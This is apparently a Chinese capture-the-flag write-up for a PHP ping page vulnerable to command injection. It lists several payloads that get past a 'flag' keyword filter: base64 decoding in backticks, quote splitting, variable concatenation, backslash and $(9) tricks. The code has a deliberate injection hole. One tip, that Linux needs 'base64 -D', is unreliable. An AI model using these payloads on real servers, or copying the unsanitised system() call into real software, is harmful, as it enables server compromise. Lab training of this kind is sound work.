注意⚠️此题是“命令执行绕过”,不是“代码执行绕过”
下发题目打开,拿到源码
<?php
highlight_file("index.php");
if(preg_match("/flag/i", $_GET["ip"]))
{
die("no flag");
}
system("ping -c 3 $_GET[ip]");
?>
传入的参数如果匹配到了flag字符就输出“no flag”
测试一下,发现flag.php就在当前目录
如果要输出flag.php的内容,我们要构造payload:?ip=;cat ./flag.php 但是flag被过滤了
我们可以用base64编码绕过
将./flag.php 转换成base64编码形式
Li9mbGFnLnBocAo=
因为要输出当前目录的flag.php内容,我们还需再把编码形式转换回来再执行
构造:
echo 'Li9mbGFnLnBocAo=' | base64 -d
(注意:Linux系统在终端d要换成大写D,否则无法运行)
但是要让这一步被执行我们还需借助一个符号——反引号 `
反引号 ` 在linux命令行中起着 命令执行的作用 ,即将转换好的base64编码反回到命令中再执行
最终payload:
?ip=;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d `
显示网页源代码
flag = "flag{I_like_qwb_web}
#其实还有更简单的方法
1.利用引号绕过(单引号双引号都行)
?ip=;cat ./fl''ag.php
2.利用变量去赋值绕过
?ip=;a=fl;b=ag;cat ./$a$b.php
(payload中也可以去除./ ,后面的我就不加了)
?ip=;cat fla\g.php
?ip=;cat fl$(9)ag.php
还有多种方法就不一一列举了。